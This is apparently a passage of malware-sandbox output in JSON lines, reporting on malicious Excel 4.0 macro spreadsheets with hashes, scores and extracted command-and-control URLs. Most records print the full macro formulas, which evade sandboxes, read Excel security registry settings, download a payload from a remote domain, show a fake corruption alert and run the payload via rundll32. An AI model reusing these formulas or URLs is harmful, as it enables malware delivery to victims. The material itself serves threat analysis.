,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UmaX2Itleb\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85c439094bb4a755eb73335ae0e2ac1f34e93014152d1f31e190cfcfddbde361"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85c439094bb4a755eb73335ae0e2ac1f34e93014152d1f31e190cfcfddbde361","filesize":152576,"md5":"cbd8345bc23d5739b3e275010c42744f","sha1":"de0b30fa3888e0167a393ec963e11a279c033874","sha256":"85c439094bb4a755eb73335ae0e2ac1f34e93014152d1f31e190cfcfddbde361","sha512":"43b790e35b4d9cb379197cfe9bca9b47a2c52efb0f293513b019cfbafc9c6a277a80fc95afad932c86fe2d2d6c29b49024f3f4fb7d6cd41c4e20c94d838f7b30","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85c439094bb4a755eb73335ae0e2ac1f34e93014152d1f31e190cfcfddbde361.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VLQ77L4chp\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85ca64cdafbf5c935fc61a0bee44aaed271306339ff3c45f792d24acdff0a79f"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85ca64cdafbf5c935fc61a0bee44aaed271306339ff3c45f792d24acdff0a79f","filesize":206336,"md5":"61afe03a8683051b9227248e1ad2ea81","sha1":"9726192dbe7270d332d5d63107dbf454e5308532","sha256":"85ca64cdafbf5c935fc61a0bee44aaed271306339ff3c45f792d24acdff0a79f","sha512":"cf6f2bc8310ad9c8e99cafbc383662273201b415173587d14ee687827b4bb811daaa36730688ff03fadfa9e69bab4750abd72801eea6309c2b8d4c558a08062e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85ca64cdafbf5c935fc61a0bee44aaed271306339ff3c45f792d24acdff0a79f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"T6WW5y4uOX\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85d3ab9c64c0186f6786be03c097a3c7805a2f639c8d5670c523d649da5664ea"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85d3ab9c64c0186f6786be03c097a3c7805a2f639c8d5670c523d649da5664ea","filesize":167936,"md5":"97f16318e1bfaba4d9cbc648edc768f0","sha1":"4e3ad19b7ada4f314413df6b8fe6ac62e0c9bffb","sha256":"85d3ab9c64c0186f6786be03c097a3c7805a2f639c8d5670c523d649da5664ea","sha512":"6a4716d74f22d93976f0e4fbca878c1a6fbdfd565e251eb907fa539a34169409572813d9f0a9f8d33a2de11e360d5b339b4ce2390467477b5203cebf71591f5c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85d3ab9c64c0186f6786be03c097a3c7805a2f639c8d5670c523d649da5664ea.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ARQcptAogQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85d53e3f033a2def5c00dd5224ff36ef2239c913b7d742a9b1da18441144d7b8"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85d53e3f033a2def5c00dd5224ff36ef2239c913b7d742a9b1da18441144d7b8","filesize":168960,"md5":"f3053df234edee8a56512b91f42971ec","sha1":"26e3137226add7886c3bb18312b10dd085809ad3","sha256":"85d53e3f033a2def5c00dd5224ff36ef2239c913b7d742a9b1da18441144d7b8","sha512":"a71bac627160525d8eaab4f3392e83cd818dd470cd13a65379cd1135382c5d1390da097bdfb77a27446e14b110dab14ed67dbc85bf898ae5d48666e4c80808e1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85d53e3f033a2def5c00dd5224ff36ef2239c913b7d742a9b1da18441144d7b8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zU7gx8Iqtm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85d78fd10ed11b6b3bfe5fc71d36b9caeabd098296167ca366c0149c99d30e4b"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85d78fd10ed11b6b3bfe5fc71d36b9caeabd098296167ca366c0149c99d30e4b","filesize":167936,"md5":"dcb5cff213f1e95a9bb030495145cf3b","sha1":"87fdfab887210e9c7da1fc23f7750905004e2da9","sha256":"85d78fd10ed11b6b3bfe5fc71d36b9caeabd098296167ca366c0149c99d30e4b","sha512":"741b6eb26e77a6bdb50890da7a3fe6fa3bfecd6f712a50209659f3aca19e5876faafa782b888f6dbb61c4f87a4f7a9fab6b605441c433adc5cd19cbcd46af9a2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85d78fd10ed11b6b3bfe5fc71d36b9caeabd098296167ca366c0149c99d30e4b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vN46pOT46C\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85deb6c349e59a4d9c42ab9259cf1008a7a426a7ed0841669c861988f8a01eb5"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85deb6c349e59a4d9c42ab9259cf1008a7a426a7ed0841669c861988f8a01eb5","filesize":206336,"md5":"952a3d2206d30833aec8a3d0a4a3d0a4","sha1":"7c196da51c0a2fef32bfddd7a4a58cafc54ee9e7","sha256":"85deb6c349e59a4d9c42ab9259cf1008a7a426a7ed0841669c861988f8a01eb5","sha512":"1b39d9e7e7ba5146766c729dffa6dc7d2aec3af7e5d544224024e2d07145217cef4b6e540c68dcca51b9ebd613808193574949c6e16f150e0b0ed49415a2bd7a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85deb6c349e59a4d9c42ab9259cf1008a7a426a7ed0841669c861988f8a01eb5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Yabw0FXSVZ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85ea3331be48e05785697bec9c567d487ee8b39c9b62c8d530473bf08ca70149"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85ea3331be48e05785697bec9c567d487ee8b39c9b62c8d530473bf08ca70149","filesize":152576,"md5":"434e8021e9d6f4a0203b318ebd297503","sha1":"3e896280883824ab9bfc13937a6acc11a0a8d6f7","sha256":"85ea3331be48e05785697bec9c567d487ee8b39c9b62c8d530473bf08ca70149","sha512":"04a921eca0e23d4622ce50031fe4085f2d4015f09fec331053b7a1e9619264a9c2d3800eee823e92eabac0d61a3fa4e124536612ba1697ef2b4eda9f48aef5c2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85ea3331be48e05785697bec9c567d487ee8b39c9b62c8d530473bf08ca70149.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NLsbObILfb\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85f89e46ba0c5639f000b45be1a53670c36b5c3f7a63ba2052684920c530b2e6"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85f89e46ba0c5639f000b45be1a53670c36b5c3f7a63ba2052684920c530b2e6","filesize":185344,"md5":"b938115aad8d09c056cbe506a0e48854","sha1":"eeee458404159288b62686e2b88b976cbf0f5277","sha256":"85f89e46ba0c5639f000b45be1a53670c36b5c3f7a63ba2052684920c530b2e6","sha512":"99b31e8291b0d3beac5cf7b59a940317c7c11221d771761fddad1468b7a6db0466648bb8158fe8b19e5e311af68f846c6bbd9513690f0268bb4ca6d1e8d1ddf1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85f89e46ba0c5639f000b45be1a53670c36b5c3f7a63ba2052684920c530b2e6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"85ff1ef38a06390723a0c72146805ac283e1f60d7fbbddbd9ca3e9dcb57342c7"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"85ff1ef38a06390723a0c72146805ac283e1f60d7fbbddbd9ca3e9dcb57342c7","filesize":112640,"md5":"041520824503d7b9d8583ce00fa50ec4","sha1":"4ef8a773d1aa3cd35345bc748e21b2e2507cb973","sha256":"85ff1ef38a06390723a0c72146805ac283e1f60d7fbbddbd9ca3e9dcb57342c7","sha512":"3692dc5cb7ecfdd650fae64516c2443f273d190bd7045998753ef6c24aa6950f1b71b80d4e988ff1e18a1cd848a12143798f15951bde408960cb2d2553171559","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"85ff1ef38a06390723a0c72146805ac283e1f60d7fbbddbd9ca3e9dcb57342c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"860c41403681dd0664716102bb7e46879a8e112a9f85fa5ce9a7a9769d965fac"},"analysis":{"reported":"2020-04-09T16:17:26Z","score":10},"files":[{"filename":"860c41403681dd0664716102bb7e46879a8e112a9f85fa5ce9a7a9769d965fac","filesize":152576,"md5":"789e5260011190f3e37f53996120ef90","sha1":"9158d4314d1cf287058807ce01836ab66cc550d1","sha256":"860c41403681dd0664716102bb7e46879a8e112a9f85fa5ce9a7a9769d965fac","sha512":"fe8f84e152aeba4697cd42df925f371ef145296438b622383b15de071d54ad81a514d2228d72669a4487d3febc168bf93dfffcfae2fc51ac2bdad4b89d5bf686","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"860c41403681dd0664716102bb7e46879a8e112a9f85fa5ce9a7a9769d965fac.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wapQshl9JU\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"860cf92401eb84ebd52b2938e475c3b0d690544d5f1735deaa2d0b904e0046fd"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"860cf92401eb84ebd52b2938e475c3b0d690544d5f1735deaa2d0b904e0046fd","filesize":209920,"md5":"61dc8c353aeb5bf97592b70ae5cbd12b","sha1":"fded8c9ed62011c9ba42abca28a46510a0b2cc77","sha256":"860cf92401eb84ebd52b2938e475c3b0d690544d5f1735deaa2d0b904e0046fd","sha512":"8b68c3c98f6edcafbea7ced4d228613e719d5bc4812a785efa42357c7b675dab7f7557f2c154a276352f80a0b0e704dc519a1b2b51d1125c687b1cf0703631bd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"860cf92401eb84ebd52b2938e475c3b0d690544d5f1735deaa2d0b904e0046fd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dvPGLvCxxS\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"86126ed25f909e115296e738200c14557f6a4de1fd384dcdc8591983ebc1b8ce"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"86126ed25f909e115296e738200c14557f6a4de1fd384dcdc8591983ebc1b8ce","filesize":185344,"md5":"cca7ebee637d8a485223bee0b0bd5ff1","sha1":"c62dc4e06104cd329802c9f7fcdc85257e915f3f","sha256":"86126ed25f909e115296e738200c14557f6a4de1fd384dcdc8591983ebc1b8ce","sha512":"f44f30fed0f8945277ae8428030ee0ea570eb5a4926e4d1f148c42d70f3b6b6506bcd6bfa39b260c773c95bbc5f9f59a500dc445895c8154ce4cbab6a6b121ae","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"86126ed25f909e115296e738200c14557f6a4de1fd384dcdc8591983ebc1b8ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8618b5ea74049317f132a1392f3daab5a3c50f1ef929cc5bfd064a52591a28fe"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"8618b5ea74049317f132a1392f3daab5a3c50f1ef929cc5bfd064a52591a28fe","filesize":214528,"md5":"eda0c3fcd0b0877fee9a4b5b63d09e5b","sha1":"f5df5aeea03931bf6d76675ffd711e1aac320960","sha256":"8618b5ea74049317f132a1392f3daab5a3c50f1ef929cc5bfd064a52591a28fe","sha512":"26f37b89c86df512db4a489e8ce061ad749146d49ad4bf46fa52d2cf6d92c2249418119d50cc43d74e26588ca39a000519d5064af0c1cac5d57d69d828566ceb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8618b5ea74049317f132a1392f3daab5a3c50f1ef929cc5bfd064a52591a28fe.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8L3Qp2FYeB\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"861cf1c0d867361bfbdd65806152eb917559df478c8ffa896cdd6ecbec7b8878"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"861cf1c0d867361bfbdd65806152eb917559df478c8ffa896cdd6ecbec7b8878","filesize":168448,"md5":"d7f0dceb08868480aa4ca2685fcd7f33","sha1":"48181b02252cbd2f64f288938cb8774fc5c38295","sha256":"861cf1c0d867361bfbdd65806152eb917559df478c8ffa896cdd6ecbec7b8878","sha512":"450c4f845a4f0645113e30afb3b27c4a5a37a2cc15a9167257fdba3f0574541c61cf0972f40f3eee16866a6a9f7b0586f9ff773e2532e23bfb3deca5a6bd93d2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"861cf1c0d867361bfbdd65806152eb917559df478c8ffa896cdd6ecbec7b8878.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BGYmh52wv5\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"862ff620ed87fc86fc86a9367392baf4777d7f5a95998f774c87c42c49d9d8f8"},"analysis":{"reported":"2020-04-09T16:17:27Z","score":10},"files":[{"filename":"862ff620ed87fc86fc86a9367392baf4777d7f5a95998f774c87c42c49d9d8f8","filesize":185344,"md5":"e9f2ba7d28cab214e129cf95af74dbfd","sha1":"879dd799c4ccdc9005c2075f23356b6920af3089","sha256":"862ff620ed87fc86fc86a9367392baf4777d7f5a95998f774c87c42c49d9d8f8","sha512":"edc942bccdc57c55f95cc01c07cb7bdb87092ef871d4dbfbf7489f275247f1d3a45b6f648777ad70d41e6b5acf22a758450cad8cb620209f32ef94106ef611c4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"862ff620ed87fc86fc86a9367392baf4777d7f5a95998f774c87c42c49d9d8f8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a 